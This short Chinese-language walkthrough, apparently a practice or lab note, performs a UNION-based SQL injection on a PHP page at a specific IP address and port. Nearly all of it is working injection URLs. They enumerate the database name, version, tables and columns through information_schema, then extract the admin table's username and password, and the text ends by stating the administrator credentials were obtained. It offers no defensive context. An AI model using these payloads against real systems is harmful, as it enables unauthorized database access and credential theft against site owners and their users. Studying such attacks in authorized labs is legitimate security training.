查相关内容(一定要在回显点处查看!)
查数据库名
http://120.203.13.75:6815/index.php?id=1 and 1=2 union select 1,database()
查数据库版本(mysql>5.0,5.0 以后的版本才有information_schema, information_schema存储着数据库名、表名、列的数据类型、访问权限等)
http://120.203.13.75:6815/index.php?id=1 and 1=2 union select 1,version()
查表名
http://120.203.13.75:6815/index.php?id=1 and 1=2 union select 1,table_name from information_schema.tables where table_schema=database() limit 0,1
查字段名
http://120.203.13.75:6815/index.php?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 0,1
http://120.203.13.75:6815/index.php?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 1,1
http://120.203.13.75:6815/index.php?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 2,1
查出 admin 表里 有 id username password 三个字段
查询字段内容
构造
?id=1 and 1=2 union select 1,username from admin limit 0,1
构造
?id=1 and 1=2 union select 1,password from admin limit 1,1
limit 1,1 没有回显,说明只有一个用户
构造
?id=1 and 1=2 union select 1,password from admin limit 0,1
如此,得到了管理员账号和密码